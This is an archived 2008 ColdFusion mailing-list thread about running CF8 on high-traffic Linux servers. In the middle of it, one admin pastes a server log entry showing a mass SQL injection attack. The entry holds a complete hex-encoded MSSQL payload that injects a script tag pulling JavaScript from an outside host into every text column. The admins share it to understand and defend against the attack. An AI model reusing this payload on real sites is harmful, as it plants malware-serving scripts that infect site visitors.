I actually reported on this in my ColdFusion in the news column in FA online. Hacker Webzine ran an article detailing SQL injection attack exploits against ColdFusion sites, and since then, we have come up on the radar as prime targets.
http://www.fusionauthority.com/news/4761-coldfusion-in-the-news-july-20-30-2008.htm It's under the heading "Hack Attack" in the column. Basically, this kind of script-kiddie attack against CF sites has been mushrooming in the last two or three weeks. Judith On Thu, Aug 7, 2008 at 6:34 PM, Cary Gordon <[EMAIL PROTECTED]> wrote: > It is a centrally controlled attack running on zombie computers. I am > pretty sure that this is related to the recent spate of hijacking and > DNS issues. You are not the lone ranger. > > Cary Gordon > The Cherry Hill Company > http://chillco.com > > > On Aug 7, 2008, at 3:23 PM, Terry Ford wrote: > >> Thanks for the update. We've been running CF8 for a few months now >> with no problems. Approximately 1.5M CF pages a day on a single >> server. The server is barely breaking a sweat too... I suspect we >> could probably do 50% more traffic on this machine without major >> performance issues. We use lots of caching. >> >> 178 days now without a reboot. Haven't had a single crash since we >> switched to CF8. Needless to say, very impressed! >> >> Totally unrelated: has anyone seen massive SQL injection attacks >> over the last few days / weeks? We're getting tens of thousands of >> injection attacks from hundreds of different IPs each day. It >> started off slow, but now they're coming in like mad. It has >> almost become a DOS attack now over the past 24 hrs. >> >> The injection attacks don't worry me -- we're well coded against >> them (and these seem to be MSSQL attacks). But the sheer volume of >> traffic being generated is starting to get a little worrisome. >> Does anyone know more about where this attack is coming from? Is >> it a centrally controlled attack, a worm, ...? >> >> >> Here is a typical attack: >> >> 70.156.129.101 - - [07/Aug/2008:17:12:33 -0500] "GET /path/ >> template.cfm?gid=1074';[EMAIL PROTECTED](4000);SET >> %20 >> @S >> = >> CAST >> (0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626 >> C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E7874797 >> 0653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C452 >> 8404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F6 >> 3737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F736372697 >> 0743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 >> %20AS%20CHAR(4000));EXEC(@S); HTTP/ >> 1.1" 200 36 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT >> 5.1; .NET CLR 1.1.4322)" >> >> >> Regards >> Terry >> >> >> --- On Fri, 8/1/08, Wil Genovese <[EMAIL PROTECTED]> wrote: >> >>> From: Wil Genovese <[EMAIL PROTECTED]> >>> Subject: Re: CF8 on linux -- who's running it on large sites? >>> To: "CF-Linux" <[email protected]> >>> Date: Friday, August 1, 2008, 6:14 PM >>>> Hey folks, >>>> >>>> Looks like this list is pretty quiet nowadays. >>>> >>>> We're about ready to upgrade to CF8 from CF6.1, >>> mainly for the >>>> performance improvements. >>>> >>>> We never upgraded from CF6.1 to 7 because 6.1 frankly >>> runs just great >>>> and we use a pretty small and optimized set of >>> features, but the juicy >>>> performance metrics of 8 look to be well worth it. >>>> >>>> I'm just curious as to how many of you larger >>> linux implementations >>>> are running CFMX 8 right now, and what your experience >>> has been >>>> stability-wise, and whether you ran into any >>> compatibility or >>>> connector issues. >>>> >>>> Regards >>>> Terry >>> >>> I just thought I would post an update on this since peoples >>> are wondering about high traffic sites. We just launched >>> the first of five CF 8.0.1 64bit servers on Linux RH 5.xx. >>> >>> So far the installs we've done (in house and >>> production) have not had any major issues. We've only >>> needed to install our custom cfx or jar's and tune the >>> JVM's. >>> >>> This week we launched a production server and with a few >>> minor JVM tuning tweaks we've got it running pretty >>> good. This weekend and Monday will tell us more. So far >>> it's handling about a third of our total website service >>> traffic. We run three CF servers behind a load balancer to >>> handle all the http://www.mlsfinder.com traffic. These >>> three servers see about 2.3 million CF Page views per day >>> (as of July 1st, 2008) and the load is spread at 33% each. >>> >>> If this weekend and Monday (our servers busiest day) >>> turnout well we'll be upgrading the remaining servers >>> next week. >>> >>> So far our cf7 code (which is really cf4 and cf5 code that >>> was tweaked enough to run on CF7) runs just fine and even >>> faster than on cf7. Turds really can fly with CF8. :-O >>> (yeah the code base is old and we are starting a new code >>> base which is CFMX OOMVC, but it all takes time and money.) >>> >>> Since we're upgrading from CF7.01 ENT 32bit to CF8.0.1 >>> 64Bit our upgrade process is as follows, make a disk image >>> (in case all goes bad) wipe the server clean and install RH >>> 5 64bit then install CF8.0.1 645 bit. Then apply all the >>> config settings. >>> >>> >>> Wil Genovese >>> Wolfnet Technologies, LLC >>> >>> >> >> > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4422 Subscription: http://www.houseoffusion.com/groups/CF-Linux/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.14
